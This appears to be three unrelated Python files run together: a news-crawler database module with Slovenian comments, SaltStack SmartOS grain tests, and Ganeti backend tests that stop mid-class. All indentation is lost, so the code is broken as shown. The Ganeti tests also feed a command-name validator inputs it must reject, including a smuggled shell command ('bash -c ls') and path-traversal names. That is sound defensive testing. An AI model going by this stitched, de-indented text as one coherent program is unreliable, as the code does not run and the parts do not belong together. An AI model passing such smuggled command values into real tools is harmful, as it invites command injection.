# ce se pa 2 urlja v 3e6 sekundah (34d17) ujemata v 48bit hashu ... sucks to be them.
# vzorc: [--STAT--] c6: 15220, c4: 4171, f:808
# [--STAT--] c6: 3209916, c4: 849209, f:95274
# pred spremembami feed_articla
d_ca_stat = {'c6': 0, 'c4': 0, 'f':0}
d_ca_n = 0
def DB_check_article(db, URL):
global d_ca_stat, d_ca_n
d_ca_n = d_ca_n + 1
if d_ca_n % 200 == 0: print '[--STAT--] c6: %d, c4: %d, f:%d' % (d_ca_stat['c6'], d_ca_stat['c4'], d_ca_stat['f'])
c = db.cursor()
c.execute("EXECUTE check_article6(%s)", (URL,)) # try last 2 months and 6B hash first
if c.rowcount > 0: # found a hit already, don't continue
d_ca_stat['c6'] += 1
return DBod(c)
else:
c.execute("EXECUTE check_article(%s)", (URL,)) # if no match, try the entire database
if c.rowcount > 0: d_ca_stat['c4'] += 1
else: d_ca_stat['f'] += 1
return DBod(c)
## article insert
def check_feed_auth(url, trust_level):
if not url: return False
scheme = url[0:4].lower()
if not scheme == 'http': return False
suffix = url[-4:]
if suffix == 'mp3': return False
if trust_level == 1:
return True
elif trust_level == 2:
return True
elif trust_level >= 3:
return False
else:
return True
###
def DB_note_overlap(db, lf, rf):
c = db.cursor()
c.execute("SELECT * FROM feed_overlap where lfeed=%s AND rfeed=%s", (lf, rf))
if c.rowcount == 0:
c.execute('INSERT INTO feed_overlap (lfeed, rfeed) VALUES (%s, %s)', (lf,rf))
else:
c.execute('UPDATE feed_overlap SET count = count + 1 WHERE lfeed=%s AND rfeed=%s', (lf,rf))
db.commit()
# !bn: resn kandidat za stored proceduro
def DB_find_insert_article(db, feed, URLm, title=None, pubdate=None, gml=None, tags=None, img=None, acl=None, enqueue=True, provider_site=None):
feed_id = feed['id']
feed_site_id = feed['siteid']
rx = feed['regex']
rdecode = feed['parse_unquote']
#print "feed:%d, regex: %s" % (feed_id, rx)
URL = URLm
try:
URL = re.compile(rx).match(URLm).group(1)
except:
# !bn: mal 'na suho' -- ce ne rata, pa pac ne ...
pass
#print "inserting real url: %s" % URL
if rdecode: URL = urllib.unquote(URL)
if len(URL) > 4095:
db.commit()
return (1,0,0,0) # fail
art=DB_check_article(db, URL)
if art:
lf = art['feedid']
rf = feed['id']
if lf == rf: return (0,1,0,0) # same feed
if lf > rf: lf,rf = rf,lf
DB_note_overlap(db, lf, rf)
db.commit()
return (0,0,1,0) # other feed
try:
# !bn: se en lookup po bazi
hostname = extract_hostname(URL)
site = DB_find_insert_site(db, hostname)
except:
db.rollback()
print URLm, " is fucked url."
return (1,0,0,0)
c = db.cursor()
c.execute("INSERT INTO feed_article (siteid, feedsiteid, feedid, enqueued, acl_tagset, publisher_siteid) VALUES (%s,%s,%s,%s,%s,%s) RETURNING id", (site['id'], feed_site_id, feed_id, enqueue, acl, provider_site))
artid = c.fetchone()[0]
c.execute("INSERT INTO feed_article_urls (fa_id, fa_feed_id, url) VALUES (%s, %s, %s)", (artid, feed_id, URL))
c.execute("INSERT INTO feed_article_meta (id, title, pub_date, tags, geo, img) VALUES (%s, %s, %s, %s, %s, %s)", (artid, title, pubdate, tags, gml, img))
#print URL, c.query
db.commit()
return (0,0,0,1) # added
def DB_insert_and_enqueue_article(db, feed, URL, title=None, pubdate=None, gml=None, tags=None, img=None, acl=None):
if not check_feed_auth(URL, feed['trust_level']): raise Exception("Wrong trust level.")
return DB_find_insert_article(db, feed, URL, title=title, pubdate=pubdate, gml=gml, tags=tags, img=img, acl=acl)
#!bn: TODO: kaj ce insertamo dva articla k mata enak final_url? (oz en 'final', drug 'one-and-only') .. zaenkrat nobenga to ne mot. fail!
def DB_post_article(db, art_id, art_feedid, art_feedsiteid, art_siteid, url, final_url, max_fau_seq, code, header, content, mode = None):
assert mode==None
c = db.cursor()
# check for collitions.
# final_url in f_a_u.url where not f_a_u.fa_id != art_id
# if match, merge, otherwise, insert
try:
c.execute("INSERT INTO article (feed_articlefeedid, feed_articlefeedsiteid, feed_articlesiteid, feed_articleid, HTTP_code, header, content) VALUES (%s,%s,%s,%s,%s,%s,%s)",
(art_feedid, art_feedsiteid, art_siteid, art_id,
code, header.decode('ascii', 'replace'), psycopg2.Binary(content)))
except:
# poskusl insertat ze obstojec article in dobil IntegrityError: Key exists
db.rollback()
DB_log(db, art_siteid, url, 902, -1)
return
# c.execute("UPDATE feed_article SET final_url=%s, enqueued=false WHERE id=%s", (final_url, art_id)) # !bn: merge: update statistike, itn.
c.execute("UPDATE feed_article SET enqueued=false WHERE id=%s", (art_id,)) # !bn: merge: update statistike, itn.
if final_url is not None and not final_url == url:
c.execute("INSERT INTO feed_article_urls (seq, fa_id, fa_feed_id, url) VALUES (%s, %s, %s, %s)", (max_fau_seq+1, art_id, art_feedid, final_url))
db.commit()
c.execute("UPDATE feed_article_meta SET is_http_error=%s WHERE id = %s", (int(code) >= 400, art_id))
if c.rowcount == 0:
print "db> could not update feed_article_meta, trying insert."
db.rollback()
c.execute("INSERT INTO feed_article_meta (id, is_http_error) VALUES (%s, %s)", (art_id, int(code) >= 400))
if int(code) < 400: c.execute("SELECT nextval('articles_downloaded')")
db.commit()
def DB_post_cleaned(db, art_id, art_feedid, art_feedsiteid, art_siteid, cleaned):
c = db.cursor()
# c.execute("INSERT INTO article (feed_articlefeedid, feed_articlefeedsiteid, feed_articlesiteid, feed_articleid, HTTP_code, header, content) VALUES (%s,%s,%s,%s,%s,%s,%s)",
# (art_feedid, art_feedsiteid, art_siteid, art_id,
# code, header.decode('ascii', 'replace'), psycopg2.Binary(content)))
# c.execute("UPDATE feed_article SET final_url=%s, enqueued=false, locked=false WHERE id=%s", (final_url, art_id))
c.execute("INSERT INTO processed_article (feed_articleid, mode, content) VALUES (%s,%s,%s)", (art_id, "cleartext", cleaned))
db.commit()
def DB_unlock_cleaning(db, artid):
return # just don't.
c = db.cursor()
c.execute("UPDATE feed_article_meta SET locked=false WHERE id = %s", (artid,))
db.commit()
def DB_retry_article(db, fa_id):
c = db.cursor()
c.execute("UPDATE feed_article SET last_attempt=NOW(), next_attempt=NOW()+1200::reltime WHERE id=%s", (fa_id,))
db.commit()
###
def DB_site_access_unlock(db, site_id):
c = db.cursor()
c.execute("UPDATE site SET last_request=NOW(), next_request=NOW()+request_interval, locked=false WHERE id = %s", (site_id,))
db.commit()
###
def DB_tag_feed(db, art_id, art_feedid, art_feedsiteid, art_siteid, name, value):
c = db.cursor()
c.execute("INSERT INTO feed_tags (feed_articleid, feed_articlefeedid, feed_articlefeedsiteid, feed_articlesiteid, name, value) VALUES (%s, %s, %s, %s, %s, %s)",
(art_id, art_feedid, art_feedsiteid, art_siteid, name, value))
db.commit()
# !bn: site je treba dat kot spremenljivko, ker jo zihr mamo...
def DB_log(db, siteid, URL, code, size):
c = db.cursor()
c.execute("INSERT INTO access_log (siteid, URL, HTTP_code, size) VALUES (%s,%s,%s,%s)", (siteid, URL, code, size))
db.commit()
###
def DB_unlock_sites(db):
DB_exec(db, "UPDATE site SET locked=false WHERE locked")
# !bn: pogoj "enqueued AND " dodan zato ker drugac nardi seq. scan cez celo tabelo
# itak hocmo unlockat samo taksne ki dejansko so enqueueani...
def DB_unlock_feedarticles(db):
return
DB_exec(db, "UPDATE feed_article SET locked=false WHERE enqueued AND locked")
SQL_FIND_REQUESTS = """
SELECT MAX(feed_article.id) AS min_fa_id, site.id as siteid
INTO TEMPORARY temp_requests
FROM feed_article
INNER JOIN site ON feed_article.siteid = site.id
WHERE
feed_article.rndpos BETWEEN %s AND %s
AND NOT site.disabled
AND NOT site.locked
AND site.next_request < NOW()
AND feed_article.enqueued
AND NOT feed_article.locked
AND feed_article.next_attempt < NOW()
GROUP BY site.id
ORDER BY RANDOM()
LIMIT %s
"""
# ref_url, rq_url, art_id, art_feedid, art_feedsiteid, art_siteid
SQL_RETR_REQUESTS="""
SELECT f.URL, a.URL, a.id, a.feedid, a.feedsiteid, a.siteid
FROM feed_article AS a
INNER JOIN temp_requests AS t ON a.id = t.min_fa_id
INNER JOIN feed AS f ON a.feedid = f.id
"""
SQL_LOCK_REQUESTS="UPDATE feed_article SET locked=true WHERE id IN (SELECT min_fa_id FROM temp_requests)"
SQL_LOCK_SITES="UPDATE site SET locked=true WHERE id IN (SELECT siteid FROM temp_requests)"
SQL_DROP_TEMPORARY="DROP TABLE temp_requests"
def DB_find_requests(db, N_req, rndp_eps = 0.001):
c = db.cursor()
rndp = random.random()
c.execute(SQL_FIND_REQUESTS, (rndp - rndp_eps, rndp + rndp_eps, N_req))
c.execute(SQL_RETR_REQUESTS)
r = c.fetchall()
c.execute(SQL_LOCK_REQUESTS)
c.execute(SQL_LOCK_SITES)
c.execute(SQL_DROP_TEMPORARY)
db.commit()
return r
|
|
"""
:codeauthor: :email:`Jorge Schrauwen <[email protected]>`
"""
import textwrap
import salt.grains.smartos as smartos
from tests.support.mock import MagicMock, Mock, mock_open, patch
from tests.support.unit import TestCase
class SmartOSGrainsTestCase(TestCase):
"""
Test cases for smartos grains
"""
def test_smartos_computenode_data(self):
"""
Get a tally of running/stopped zones
Output used form a test host with one running
and one stopped of each vm type.
"""
grains_exp_res = {
"computenode_sdc_version": "7.0",
"computenode_vm_capable": True,
"computenode_vm_hw_virt": "vmx",
"computenode_vms_running": 3,
"computenode_vms_stopped": 3,
"computenode_vms_total": 6,
"computenode_vms_type": {"KVM": 2, "LX": 2, "OS": 2},
"manufacturer": "Supermicro",
"productname": "X8STi",
"uuid": "534d4349-0002-2790-2500-2790250054c5",
}
cmd_mock = Mock(
side_effect=[
textwrap.dedent(
"""\
99e40ee7-a8f9-4b57-9225-e7bd19f64b07:test_hvm1:running:BHYV
cde351a9-e23d-6856-e268-fff10fe603dc:test_hvm2:stopped:BHYV
99e40ee7-a8f9-4b57-9225-e7bd19f64b07:test_hvm3:running:KVM
cde351a9-e23d-6856-e268-fff10fe603dc:test_hvm4:stopped:KVM
179b50ca-8a4d-4f28-bb08-54b2cd350aa5:test_zone1:running:OS
42846fbc-c48a-6390-fd85-d7ac6a76464c:test_zone2:stopped:OS
4fd2d7a4-38c4-4068-a2c8-74124364a109:test_zone3:running:LX
717abe34-e7b9-4387-820e-0bb041173563:test_zone4:stopped:LX"""
),
textwrap.dedent(
"""\
{
"Live Image": "20181011T004530Z",
"System Type": "SunOS",
"Boot Time": "1562528522",
"SDC Version": "7.0",
"Manufacturer": "Supermicro",
"Product": "X8STi",
"Serial Number": "1234567890",
"SKU Number": "To Be Filled By O.E.M.",
"HW Version": "1234567890",
"HW Family": "High-End Desktop",
"Setup": "false",
"VM Capable": true,
"Bhyve Capable": false,
"Bhyve Max Vcpus": 0,
"HVM API": false,
"CPU Type": "Intel(R) Xeon(R) CPU W3520 @ 2.67GHz",
"CPU Virtualization": "vmx",
"CPU Physical Cores": 1,
"Admin NIC Tag": "",
"UUID": "534d4349-0002-2790-2500-2790250054c5",
"Hostname": "sdc",
"CPU Total Cores": 8,
"MiB of Memory": "16375",
"Zpool": "zones",
"Zpool Disks": "c1t0d0,c1t1d0",
"Zpool Profile": "mirror",
"Zpool Creation": 1406392163,
"Zpool Size in GiB": 1797,
"Disks": {
"c1t0d0": {"Size in GB": 2000},
"c1t1d0": {"Size in GB": 2000}
},
"Boot Parameters": {
"smartos": "true",
"console": "text",
"boot_args": "",
"bootargs": ""
},
"Network Interfaces": {
"e1000g0": {"MAC Address": "00:00:00:00:00:01", "ip4addr": "123.123.123.123", "Link Status": "up", "NIC Names": ["admin"]},
"e1000g1": {"MAC Address": "00:00:00:00:00:05", "ip4addr": "", "Link Status": "down", "NIC Names": []}
},
"Virtual Network Interfaces": {
},
"Link Aggregations": {
}
}"""
),
]
)
with patch.dict(smartos.__salt__, {"cmd.run": cmd_mock}):
grains_res = smartos._smartos_computenode_data()
self.assertEqual(grains_exp_res, grains_res)
def test_smartos_zone_data(self):
"""
Get basic information about a non-global zone
"""
grains_exp_res = {
"imageversion": "pkgbuild 18.1.0",
"zoneid": "5",
"zonename": "dda70f61-70fe-65e7-cf70-d878d69442d4",
}
cmd_mock = Mock(
side_effect=[
"5:dda70f61-70fe-65e7-cf70-d878d69442d4:running:/:dda70f61-70fe-65e7-cf70-d878d69442d4:native:excl:0",
]
)
fopen_mock = mock_open(
read_data={
"/etc/product": textwrap.dedent(
"""\
Name: Joyent Instance
Image: pkgbuild 18.1.0
Documentation: https://docs.joyent.com/images/smartos/pkgbuild
"""
),
}
)
with patch.dict(smartos.__salt__, {"cmd.run": cmd_mock}), patch(
"os.path.isfile", MagicMock(return_value=True)
), patch("salt.utils.files.fopen", fopen_mock):
grains_res = smartos._smartos_zone_data()
self.assertEqual(grains_exp_res, grains_res)
def test_smartos_zone_pkgsrc_data_in_zone(self):
"""
Get pkgsrc information from a zone
"""
grains_exp_res = {
"pkgsrcpath": (
"https://pkgsrc.joyent.com/packages/SmartOS/2018Q1/x86_64/All"
),
"pkgsrcversion": "2018Q1",
}
isfile_mock = Mock(side_effect=[True, False])
fopen_mock = mock_open(
read_data={
"/opt/local/etc/pkg_install.conf": textwrap.dedent(
"""\
GPG_KEYRING_VERIFY=/opt/local/etc/gnupg/pkgsrc.gpg
GPG_KEYRING_PKGVULN=/opt/local/share/gnupg/pkgsrc-security.gpg
PKG_PATH=https://pkgsrc.joyent.com/packages/SmartOS/2018Q1/x86_64/All
"""
),
}
)
with patch("os.path.isfile", isfile_mock), patch(
"salt.utils.files.fopen", fopen_mock
):
grains_res = smartos._smartos_zone_pkgsrc_data()
self.assertEqual(grains_exp_res, grains_res)
def test_smartos_zone_pkgsrc_data_in_globalzone(self):
"""
Get pkgsrc information from the globalzone
"""
grains_exp_res = {
"pkgsrcpath": "https://pkgsrc.joyent.com/packages/SmartOS/trunk/tools/All",
"pkgsrcversion": "trunk",
}
isfile_mock = Mock(side_effect=[False, True])
fopen_mock = mock_open(
read_data={
"/opt/tools/etc/pkg_install.conf": textwrap.dedent(
"""\
GPG_KEYRING_PKGVULN=/opt/tools/share/gnupg/pkgsrc-security.gpg
GPG_KEYRING_VERIFY=/opt/tools/etc/gnupg/pkgsrc.gpg
PKG_PATH=https://pkgsrc.joyent.com/packages/SmartOS/trunk/tools/All
VERIFIED_INSTALLATION=always
"""
),
}
)
with patch("os.path.isfile", isfile_mock), patch(
"salt.utils.files.fopen", fopen_mock
):
grains_res = smartos._smartos_zone_pkgsrc_data()
self.assertEqual(grains_exp_res, grains_res)
def test_smartos_zone_pkgin_data_in_zone(self):
"""
Get pkgin information from a zone
"""
grains_exp_res = {
"pkgin_repositories": [
"https://pkgsrc.joyent.com/packages/SmartOS/2018Q1/x86_64/All",
"http://pkg.blackdot.be/packages/2018Q1/x86_64/All",
],
}
isfile_mock = Mock(side_effect=[True, False])
fopen_mock = mock_open(
read_data={
"/opt/local/etc/pkgin/repositories.conf": textwrap.dedent(
"""\
# $Id: repositories.conf,v 1.3 2012/06/13 13:50:17 imilh Exp $
#
# Pkgin repositories list
#
# Simply add repositories URIs one below the other
#
# WARNING: order matters, duplicates will not be added, if two
# repositories hold the same package, it will be fetched from
# the first one listed in this file.
#
# This file format supports the following macros:
# $arch to define the machine hardware platform
# $osrelease to define the release version for the operating system
#
# Remote ftp repository
#
# ftp://ftp.netbsd.org/pub/pkgsrc/packages/NetBSD/$arch/5.1/All
#
# Remote http repository
#
# http://mirror-master.dragonflybsd.org/packages/$arch/DragonFly-$osrelease/stable/All
#
# Local repository (must contain a pkg_summary.gz or bz2)
#
# file:///usr/pkgsrc/packages/All
#
https://pkgsrc.joyent.com/packages/SmartOS/2018Q1/x86_64/All
http://pkg.blackdot.be/packages/2018Q1/x86_64/All
"""
),
}
)
with patch("os.path.isfile", isfile_mock), patch(
"salt.utils.files.fopen", fopen_mock
):
grains_res = smartos._smartos_zone_pkgin_data()
self.assertEqual(grains_exp_res, grains_res)
def test_smartos_zone_pkgin_data_in_globalzone(self):
"""
Get pkgin information from the globalzone
"""
grains_exp_res = {
"pkgin_repositories": [
"https://pkgsrc.joyent.com/packages/SmartOS/trunk/tools/All",
],
}
isfile_mock = Mock(side_effect=[False, True])
fopen_mock = mock_open(
read_data={
"/opt/tools/etc/pkgin/repositories.conf": textwrap.dedent(
"""\
#
# Pkgin repositories list
#
# Simply add repositories URIs one below the other
#
# WARNING: order matters, duplicates will not be added, if two
# repositories hold the same package, it will be fetched from
# the first one listed in this file.
#
# This file format supports the following macros:
# $arch to define the machine hardware platform
# $osrelease to define the release version for the operating system
#
# Remote ftp repository
#
# ftp://ftp.netbsd.org/pub/pkgsrc/packages/NetBSD/$arch/5.1/All
#
# Remote http repository
#
# http://mirror-master.dragonflybsd.org/packages/$arch/DragonFly-$osrelease/stable/All
#
# Local repository (must contain a pkg_summary.gz or bz2)
#
# file:///usr/pkgsrc/packages/All
#
https://pkgsrc.joyent.com/packages/SmartOS/trunk/tools/All
"""
),
}
)
with patch("os.path.isfile", isfile_mock), patch(
"salt.utils.files.fopen", fopen_mock
):
grains_res = smartos._smartos_zone_pkgin_data()
self.assertEqual(grains_exp_res, grains_res)
|
|
#!/usr/bin/python
#
# Copyright (C) 2010, 2013 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Script for testing ganeti.backend"""
import mock
import os
import shutil
import tempfile
import testutils
import unittest
from ganeti import backend
from ganeti import constants
from ganeti import errors
from ganeti import hypervisor
from ganeti import netutils
from ganeti import utils
class TestX509Certificates(unittest.TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def test(self):
(name, cert_pem) = backend.CreateX509Certificate(300, cryptodir=self.tmpdir)
self.assertEqual(utils.ReadFile(os.path.join(self.tmpdir, name,
backend._X509_CERT_FILE)),
cert_pem)
self.assert_(0 < os.path.getsize(os.path.join(self.tmpdir, name,
backend._X509_KEY_FILE)))
(name2, cert_pem2) = \
backend.CreateX509Certificate(300, cryptodir=self.tmpdir)
backend.RemoveX509Certificate(name, cryptodir=self.tmpdir)
backend.RemoveX509Certificate(name2, cryptodir=self.tmpdir)
self.assertEqual(utils.ListVisibleFiles(self.tmpdir), [])
def testNonEmpty(self):
(name, _) = backend.CreateX509Certificate(300, cryptodir=self.tmpdir)
utils.WriteFile(utils.PathJoin(self.tmpdir, name, "hello-world"),
data="Hello World")
self.assertRaises(backend.RPCFail, backend.RemoveX509Certificate,
name, cryptodir=self.tmpdir)
self.assertEqual(utils.ListVisibleFiles(self.tmpdir), [name])
class TestNodeVerify(testutils.GanetiTestCase):
def setUp(self):
testutils.GanetiTestCase.setUp(self)
self._mock_hv = None
def _GetHypervisor(self, hv_name):
self._mock_hv = hypervisor.GetHypervisor(hv_name)
self._mock_hv.ValidateParameters = mock.Mock()
self._mock_hv.Verify = mock.Mock()
return self._mock_hv
def testMasterIPLocalhost(self):
# this a real functional test, but requires localhost to be reachable
local_data = (netutils.Hostname.GetSysName(),
constants.IP4_ADDRESS_LOCALHOST)
result = backend.VerifyNode({constants.NV_MASTERIP: local_data}, None, {})
self.failUnless(constants.NV_MASTERIP in result,
"Master IP data not returned")
self.failUnless(result[constants.NV_MASTERIP], "Cannot reach localhost")
def testMasterIPUnreachable(self):
# Network 192.0.2.0/24 is reserved for test/documentation as per
# RFC 5737
bad_data = ("master.example.com", "192.0.2.1")
# we just test that whatever TcpPing returns, VerifyNode returns too
netutils.TcpPing = lambda a, b, source=None: False
result = backend.VerifyNode({constants.NV_MASTERIP: bad_data}, None, {})
self.failUnless(constants.NV_MASTERIP in result,
"Master IP data not returned")
self.failIf(result[constants.NV_MASTERIP],
"Result from netutils.TcpPing corrupted")
def testVerifyHvparams(self):
test_hvparams = {constants.HV_XEN_CMD: constants.XEN_CMD_XL}
test_what = {constants.NV_HVPARAMS: \
[("mynode", constants.HT_XEN_PVM, test_hvparams)]}
result = {}
backend._VerifyHvparams(test_what, True, result,
get_hv_fn=self._GetHypervisor)
self._mock_hv.ValidateParameters.assert_called_with(test_hvparams)
def testVerifyHypervisors(self):
hvname = constants.HT_XEN_PVM
hvparams = {constants.HV_XEN_CMD: constants.XEN_CMD_XL}
all_hvparams = {hvname: hvparams}
test_what = {constants.NV_HYPERVISOR: [hvname]}
result = {}
backend._VerifyHypervisors(
test_what, True, result, all_hvparams=all_hvparams,
get_hv_fn=self._GetHypervisor)
self._mock_hv.Verify.assert_called_with(hvparams=hvparams)
def _DefRestrictedCmdOwner():
return (os.getuid(), os.getgid())
class TestVerifyRestrictedCmdName(unittest.TestCase):
def testAcceptableName(self):
for i in ["foo", "bar", "z1", "000first", "hello-world"]:
for fn in [lambda s: s, lambda s: s.upper(), lambda s: s.title()]:
(status, msg) = backend._VerifyRestrictedCmdName(fn(i))
self.assertTrue(status)
self.assertTrue(msg is None)
def testEmptyAndSpace(self):
for i in ["", " ", "\t", "\n"]:
(status, msg) = backend._VerifyRestrictedCmdName(i)
self.assertFalse(status)
self.assertEqual(msg, "Missing command name")
def testNameWithSlashes(self):
for i in ["/", "./foo", "../moo", "some/name"]:
(status, msg) = backend._VerifyRestrictedCmdName(i)
self.assertFalse(status)
self.assertEqual(msg, "Invalid command name")
def testForbiddenCharacters(self):
for i in ["#", ".", "..", "bash -c ls", "'"]:
(status, msg) = backend._VerifyRestrictedCmdName(i)
self.assertFalse(status)
self.assertEqual(msg, "Command name contains forbidden characters")
class TestVerifyRestrictedCmdDirectory(unittest.TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def testCanNotStat(self):
tmpname = utils.PathJoin(self.tmpdir, "foobar")
self.assertFalse(os.path.exists(tmpname))
(status, msg) = \
backend._VerifyRestrictedCmdDirectory(tmpname, _owner=NotImplemented)
self.assertFalse(status)
self.assertTrue(msg.startswith("Can't stat(2) '"))
def testTooPermissive(self):
tmpname = utils.PathJoin(self.tmpdir, "foobar")
os.mkdir(tmpname)
for mode in [0777, 0706, 0760, 0722]:
os.chmod(tmpname, mode)
self.assertTrue(os.path.isdir(tmpname))
(status, msg) = \
backend._VerifyRestrictedCmdDirectory(tmpname, _owner=NotImplemented)
self.assertFalse(status)
self.assertTrue(msg.startswith("Permissions on '"))
def testNoDirectory(self):
tmpname = utils.PathJoin(self.tmpdir, "foobar")
utils.WriteFile(tmpname, data="empty\n")
self.assertTrue(os.path.isfile(tmpname))
(status, msg) = \
backend._VerifyRestrictedCmdDirectory(tmpname,
_owner=_DefRestrictedCmdOwner())
self.assertFalse(status)
self.assertTrue(msg.endswith("is not a directory"))
def testNormal(self):
tmpname = utils.PathJoin(self.tmpdir, "foobar")
os.mkdir(tmpname)
os.chmod(tmpname, 0755)
self.assertTrue(os.path.isdir(tmpname))
(status, msg) = \
backend._VerifyRestrictedCmdDirectory(tmpname,
_owner=_DefRestrictedCmdOwner())
self.assertTrue(status)
self.assertTrue(msg is None)
class TestVerifyRestrictedCmd(unittest.TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def testCanNotStat(self):
tmpname = utils.PathJoin(self.tmpdir, "helloworld")
self.assertFalse(os.path.exists(tmpname))
(status, msg) = \
backend._VerifyRestrictedCmd(self.tmpdir, "helloworld",
_owner=NotImplemented)
self.assertFalse(status)
self.assertTrue(msg.startswith("Can't stat(2) '"))
def testNotExecutable(self):
tmpname = utils.PathJoin(self.tmpdir, "cmdname")
utils.WriteFile(tmpname, data="empty\n")
(status, msg) = \
backend._VerifyRestrictedCmd(self.tmpdir, "cmdname",
_owner=_DefRestrictedCmdOwner())
self.assertFalse(status)
self.assertTrue(msg.startswith("access(2) thinks '"))
def testExecutable(self):
tmpname = utils.PathJoin(self.tmpdir, "cmdname")
utils.WriteFile(tmpname, data="empty\n", mode=0700)
(status, executable) = \
backend._VerifyRestrictedCmd(self.tmpdir, "cmdname",
_owner=_DefRestrictedCmdOwner())
self.assertTrue(status)
self.assertEqual(executable, tmpname)
class TestPrepareRestrictedCmd(unittest.TestCase):
_TEST_PATH = "/tmp/some/test/path"
def testDirFails(self):
def fn(path):
self.assertEqual(path, self._TEST_PATH)
return (False, "test error 31420")
(status, msg) = \
backend._PrepareRestrictedCmd(self._TEST_PATH, "cmd21152",
_verify_dir=fn,
_verify_name=NotImplemented,
_verify_cmd=NotImplemented)
self.assertFalse(status)
self.assertEqual(msg, "test error 31420")
def testNameFails(self):
def fn(cmd):
self.assertEqual(cmd, "cmd4617")
return (False, "test error 591")
(status, msg) = \
backend._PrepareRestrictedCmd(self._TEST_PATH, "cmd4617",
_verify_dir=lambda _: (True, None),
_verify_name=fn,
_verify_cmd=NotImplemented)
self.assertFalse(status)
self.assertEqual(msg, "test error 591")
def testCommandFails(self):
def fn(path, cmd):
self.assertEqual(path, self._TEST_PATH)
self.assertEqual(cmd, "cmd17577")
return (False, "test error 25524")
(status, msg) = \
backend._PrepareRestrictedCmd(self._TEST_PATH, "cmd17577",
_verify_dir=lambda _: (True, None),
_verify_name=lambda _: (True, None),
_verify_cmd=fn)
self.assertFalse(status)
self.assertEqual(msg, "test error 25524")
def testSuccess(self):
def fn(path, cmd):
return (True, utils.PathJoin(path, cmd))
(status, executable) = \
backend._PrepareRestrictedCmd(self._TEST_PATH, "cmd22633",
_verify_dir=lambda _: (True, None),
_verify_name=lambda _: (True, None),
_verify_cmd=fn)
self.assertTrue(status)
self.assertEqual(executable, utils.PathJoin(self._TEST_PATH, "cmd22633"))
def _SleepForRestrictedCmd(duration):
assert duration > 5
def _GenericRestrictedCmdError(cmd):
return "Executing command '%s' failed" % cmd
class TestRunRestrictedCmd(unittest.TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def testNonExistantLockDirectory(self):
lockfile = utils.PathJoin(self.tmpdir, "does", "not", "exist")
sleep_fn = testutils.CallCounter(_SleepForRestrictedCmd)
self.assertFalse(os.path.exists(lockfile))
self.assertRaises(backend.RPCFail,
backend.RunRestrictedCmd, "test",
_lock_timeout=NotImplemented,
_lock_file=lockfile,
_path=NotImplemented,
_sleep_fn=sleep_fn,
_prepare_fn=NotImplemented,
_runcmd_fn=NotImplemented,
_enabled=True)
self.assertEqual(sleep_fn.Count(), 1)
@staticmethod
def _TryLock(lockfile):
sleep_fn = testutils.CallCounter(_SleepForRestrictedCmd)
result = False
try:
backend.RunRestrictedCmd("test22717",
_lock_timeout=0.1,
_lock_file=lockfile,
_path=NotImplemented,
_sleep_fn=sleep_fn,
_prepare_fn=NotImplemented,
_runcmd_fn=NotImplemented,
_enabled=True)
except backend.RPCFail, err:
assert str(err) == _GenericRestrictedCmdError("test22717"), \
"Did not fail with generic error message"
result = True
assert sleep_fn.Count() == 1
return result
def testLockHeldByOtherProcess(self):
lockfile = utils.PathJoin(self.tmpdir, "lock")
lock = utils.FileLock.Open(lockfile)
lock.Exclusive(blocking=True, timeout=1.0)
try:
self.assertTrue(utils.RunInSeparateProcess(self._TryLock, lockfile))
finally:
lock.Close()
@staticmethod
def _PrepareRaisingException(path, cmd):
assert cmd == "test23122"
raise Exception("test")
def testPrepareRaisesException(self):
lockfile = utils.PathJoin(self.tmpdir, "lock")
sleep_fn = testutils.CallCounter(_SleepForRestrictedCmd)
prepare_fn = testutils.CallCounter(self._PrepareRaisingException)
try:
backend.RunRestrictedCmd("test23122",
_lock_timeout=1.0, _lock_file=lockfile,
_path=NotImplemented, _runcmd_fn=NotImplemented,
_sleep_fn=sleep_fn, _prepare_fn=prepare_fn,
_enabled=True)
except backend.RPCFail, err:
self.assertEqual(str(err), _GenericRestrictedCmdError("test23122"))
else:
self.fail("Didn't fail")
self.assertEqual(sleep_fn.Count(), 1)
self.assertEqual(prepare_fn.Count(), 1)
@staticmethod
def _PrepareFails(path, cmd):
assert cmd == "test29327"
return ("some error message", None)
def testPrepareFails(self):
lockfile = utils.PathJoin(self.tmpdir, "lock")
sleep_fn = testutils.CallCounter(_SleepForRestrictedCmd)
prepare_fn = testutils.CallCounter(self._PrepareFails)
try:
backend.RunRestrictedCmd("test29327",
_lock_timeout=1.0, _lock_file=lockfile,
_path=NotImplemented, _runcmd_fn=NotImplemented,
_sleep_fn=sleep_fn, _prepare_fn=prepare_fn,
_enabled=True)
except backend.RPCFail, err:
self.assertEqual(str(err), _GenericRestrictedCmdError("test29327"))
else:
self.fail("Didn't fail")
self.assertEqual(sleep_fn.Count(), 1)
